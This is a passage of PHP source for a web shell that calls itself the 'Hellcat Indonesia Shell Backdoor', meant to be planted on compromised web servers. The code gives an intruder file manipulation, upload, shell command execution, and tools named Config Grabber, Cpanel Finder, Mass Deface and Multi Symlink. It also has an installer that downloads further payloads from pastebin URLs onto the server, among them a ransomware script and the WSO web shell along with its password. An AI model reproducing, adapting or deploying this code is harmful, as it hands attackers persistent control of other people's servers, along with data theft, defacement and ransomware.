@unlink($â–Ÿ);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_COEG['msv5']))
foreach($_COEG['msv5'] as $f) {
if($f == '..')
continue;
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_COOKIE['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE['msv5'] as $f)
copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
} elseif($_COOKIE['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE['msv5'] as $f)
@rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
} elseif($_COOKIE['act'] == 'zip') {
if(class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip->open($_COEG['p2'], 1)) {
chdir($_COOKIE['location']);
foreach($_COOKIE['msv5'] as $f) {
if($f == '..')
continue;
if(@is_file($_COOKIE['location'].$f))
$zip->addFile($_COOKIE['location'].$f, $f);
elseif(@is_dir($_COOKIE['location'].$f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
foreach ($iterator as $key=>$value) {
$zip->addFile(realpath($key), $key);
}
}
}
chdir($GLOBALS['cwd']);
$zip->close();
}
}
} elseif($_COOKIE['act'] == 'unzip') {
if(class_exists('ZipArchive')) {
$zip = new ZipArchive();
foreach($_COOKIE['msv5'] as $f) {
if($zip->open($_COOKIE['location'].$f)) {
$zip->extractTo($GLOBALS['cwd']);
$zip->close();
}
}
}
} elseif($_COOKIE['act'] == 'tar') {
chdir($_COOKIE['location']);
$_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
chdir($GLOBALS['cwd']);
}
unset($_COOKIE['msv5']);
setcookie('msv5', '', time() - 3600);
break;
default:
if(!empty($_COEG['hcx'])) {
vb('act', $_COEG['hcx']);
vb('msv5', serialize(@$_COEG['msv5']));
vb('location', @$_COEG['location']);
}
break;
}
}
vars('<script>function m1s(){
if(document.getElementById("act").value == ""){');
s('Select Action !!');
vars(' return false;
}
document.getElementById("sks").submit();
}
</script>');
vars('

');
vars('<div class="coL-panel">
<td class="td-panel"><i class="fa fa-newspaper-o"></i><td class="td-panel-right"><marquee>Hellcat Indonesia Shell Backdoor - Version 1.3</marquee>

</div>');

$dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
if($dirContent === false) {
vars('<script>c("?'.x7.'error&'.x5.$dir.'");</script>');
return;
}
global $sort;
$sort = array('name', 1);
if(!empty($_COEG['hcx'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
$sort = array($match[1], (int)$match[2]);
}
vars('<script language="JavaScript">
function toggle(source) {
checkboxes = document.getElementsByName("msv5[]");
for(var i=0, n=checkboxes.length;i<n;i++) {
checkboxes[i].checked = source.checked;
}
}
</script>');
vars('<table class="table-file" cellspacing="0">
<th class="th-file">Name</th>
<th class="th-file" style="width:80px">Size</th>
<th class="th-file" style="width:65px">Action</th>
<th class="th-file"></th>
');
$dir = getcwd();
$scn = scandir($dir);
foreach($scn as $dirx) {
$dtype = filetype("$dir/$dirx");
if(!is_dir("$dir/$dirx")) continue;
if($dirx === '..') {
$href = '<a class="a" onclick=\'c("?'.x5.dirname($dir).'")\'>'.$dirx.'</a>';
}
elseif($dirx === '.') {
$href = '<a class="a" onclick=\'c("?'.x5.$dir.'")\'>'.$dirx.'</a>';
} else {
$href = '<a class="a" onclick=\'c("?dir='.$dir.'/'.$dirx.'")\'>'.$dirx.'</a>';
}
if($dirx === '.' || $dirx === '..') {
$d_zx = "<font color='#ddd'>--</font>";
$ckh = '';
} else {
$d_zx = '<a class="a" onclick=\'c("?'.x7.'upload&'.x5.$dir.'/'.$dirx.'")\'>U</a> |
<a class="a" onclick=\'c("?'.x7.'renadir&'.x5.$dir.'/'.$dirx.'")\'>R</a> | <a class="a" onclick=\'c("?'.x7.'deledir&'.x5.$dir.'/'.$dirx.'")\'>D</a>';
$ckh = '';
}
echo "<tr class='ex-hov'>";
echo "<td class='td-file break'><i class='fa fa-folder-o'></i> [ $href
]";
echo "<td align='center' class='td-file'>--</th>";
echo "<td align='center' class='td-file'>$d_zx";
echo "<td align='center' class='td-file' style='width:10px'>".$ckh."";
}
echo "";
foreach($scn as $file) {
$ftype = filetype("$dir/$file");
$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
$size = filesize("$dir/$file")/1024;
$size = round($size,3);
if($size > 1024) {
$size = round($size/1024,2). 'MB';
} else {
$size = $size. 'KB';
}
if(!is_file("$dir/$file")) continue;
echo "<tr class='ex-hov'>";
echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i> <a class="a" onclick="c(\'?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'\')">'.$file.'</a>';
echo "<td align='center' class='td-file'>$size";
echo "<td align='center' class='td-file'>";
echo '<a class="a" onclick=\'c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$file.'")\'>OPEN</a>';
vars("<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> ");
}
vars("<table style='width:100%;margin-top:2px' cellspacing='0'>
<td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)>
<input type=hidden name=ne value=''>
<input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
<input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
<td style='width:70%'><select name='hcx' style='width:100%' id='act'>");
if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
vars("<option value='paste'>Paste</option>");
vars("<option value=''>-- OPTIONS --</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
if(class_exists('ZipArchive'))
vars("<option value='zip'>Compress (.zip)</option>");
vars("</select>");
if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
vars("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
vars("<td style='width:20%;text-align:right'><button onmousedown='bleep.play();'
type='submit' onclick='m1s(); return false;' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button>

");
if(isset($_COEG['ndir'])) {
$cdir = $_COEG['newinput'];
if (is_dir($dir.'/'.$cdir)) {
error('Directory Already Exist !!');
} else {
if(mkdir($dir.'/'.$cdir, 0777)) {
vars('<script>c("?'.x5.$dir.'");</script>');;
} else {
error('Can\'t Create Directory !!'); } } }
if(isset($_COEG['nfil'])) {
$cfile = $_COEG['newinput'];
if (file_exists($dir.'/'.$cfile)) {
error('File Already Exist !!');
} else {
if(fopen($dir.'/'.$cfile, "w+")) {
vars('<script>c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$cfile.'");</script>');
} else {
error('Can\'t Create File !!');
}
}
}
vars('<script language="Javascript">
function cog(){
if(document.forms[\'new\'].newinput.value === "") {');
s('Can\'t Be Empty !!');
vars('return false;
}
}
</script>');
vars('<script type="text/javascript">
function valid(field) {
var re = /^[0-9-A-z.]*$/;
if (!re.test(field.value)) {');
s('Invalid Name !!');
vars('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
}
}
</script>');
vars('<table style="margin-top:3px" cellspacing="0">');
}

vars('<hr></div>');
vars('<div class="coR">
<div class="coR-panel">
<td class="td-panel"><i class="fa fa-chevron-circle-down"></i><td class="td-panel-right">MENU

</div><div class="tools-content">');
$path = getcwd();
if(isset($_FILES['data'])) {
if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
success('File Uploaded !!');
mtr('?'.x5.$dir);
} else {
error('Upload Failed !!');
}
}
echo '<script>function upload(){
if(document.getElementById("up").value == ""){';
s('Select Your File !!');
vars('return false;
}
document.getElementById("%").submit();
}
</script>');
vars('<td align="center" valign="top" style="width:10%;padding-top:9px"><i class="fa fa-upload"></i>

<td style="width:70%">

<td style="width:20%"><button onmousedown="bleep.play();"
type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button>

');
if(isset($_COEG['x'])) {
$rse = $_COEG['file_name'];
$zip = new ZipArchive ;
if($zip ->open($path.'/'.$rse) === TRUE) {
$zip ->extractTo($path);
$zip ->close();
success('[ '.$rse.' ] Extracted !!');
mtr('?'.x5.$dir);
} else {
error('Permission Denied !!');
}
}
vars('<script>function unzip(){
if(document.getElementById("u").value == ""){');
s('Select File [.zip] !!');
vars('return false;
}
document.getElementById("sks").submit();
}
</script>');
echo '<hr>

<td align="center" style="width:10%"><i class="fa fa-file-archive-o"></i>
<td style="width:70%"><select name="file_name" id="u">
<option value=""> -- Choose Zip File --</option>';
$scandir = scandir($path);
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
if(preg_match('/\.zip$/mis',$file)) {
echo '<option>'.$file.'</option>';
}
}
echo '</select><td style="width:20%;text-align:right"><button onmousedown="bleep.play();"
type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button>

';

vars('</div>');
vars('<div class="coR-panel top">
<td class="td-panel"><i class="fa fa-cogs"></i><td class="td-panel-right">TOOLS : <font color="green">10</font>

</div>
<div class="tools-content">');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">System Information<td class="td-tools-icon"><a onclick=\'c("?'.x7.'system&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Multiple Upload<td class="td-tools-icon"><a onclick=\'c("?'.x7.'upload&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Jumping Server<td class="td-tools-icon"><a onclick=\'c("?'.x7.'jumping&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Config Grabber<td class="td-tools-icon"><a onclick=\'c("?'.x7.'config&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Cookies Manager<td class="td-tools-icon"><a onclick=\'c("?'.x7.'cookie&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Cpanel Finder<td class="td-tools-icon"><a onclick=\'c("?'.x7.'cpanel&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Mass Deface<td class="td-tools-icon"><a onclick=\'c("?'.x7.'massdef&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Multi Hash<td class="td-tools-icon"><a onclick=\'c("?'.x7.'multihash&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Multi Symlink<td class="td-tools-icon"><a onclick=\'c("?'.x7.'symlink&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');
vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Change Password<td class="td-tools-icon"><a onclick=\'c("?'.x7.'change&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a>');

vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i><td class="td-tools-content">Access [ <font color="1D9D73">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]<td class="td-tools-icon"><a onclick=\'c("?'.x7.'kill&'.x5.$dir.'")\'><button onmousedown="bleep.play();" class="btn-exe"><i class="fa fa-trash"></i></button></a></div>');

// --- Create File --- //
vars('<script>function create(){
if(document.getElementById("c").value == ""){');
s('Select Action !!');
vars('return false;
}
document.getElementById("sks").submit();
}
</script>');
if($_COEG['op']=="1") {
if(op('uploader.php', 'https://pastebin.com/raw/8WtSVk6k')) {
success('Done !!');
mtr('?'.x5.$dir);
} else {
error('Failed !!');
}
}
if($_COEG['op']=="2") {
if(op('mailler.php', 'https://pastebin.com/raw/TPtpvxZt')) {
success('Done !!');
mtr('?'.x5.$dir);
} else {
error('Failed !!');
}
}

if($_COEG['op']=="3") {
if(op('php.ini', 'https://pastebin.com/raw/gnbXUciS')) {
success('Done !!');
mtr('?'.x5.$dir);
} else {
error('Failed !!');
}
}

if($_COEG['op']=="5") {
if(op('ransomware.php', 'https://pastebin.com/raw/CZMeawF0')) {
success('Done !!');
mtr('?'.x5.$dir);
} else {
error('Failed !!');
}
}
if($_COEG['op']=="6") {
if(op('wso.php', 'https://pastebin.com/raw/1GeZGycM')) {
success('Done !!');
mtr('?'.x5.$dir);
} else {
error('Failed !!');
}
}
vars('<div class="tools-content top" style="padding:5px">');
vars('
<td align="center" style="width:10%"><i class="fa fa-download"></span>
<td style="width:70%"><select name="op" id="c">');
vars('<option value=""> -- INSTALLER --</option>');
vars('<option value="1">uploader.php</option>');
vars('<option value="2">mailler.php</option>');
vars('<option value="3">php.ini</option>');
vars('<option value="5">ransomware.php</option>');
vars('<option value="6">wso.php [ pass : brtz07 ]</option>');
vars('</select>
<td style="width:20%;text-align:right"><button onmousedown="bleep.play();" type="submit" class="btn-exe" onclick="create();return false;"><i class="fa fa-arrow-circle-right"></i></button>

</div>');

//-- THANKS ALL --//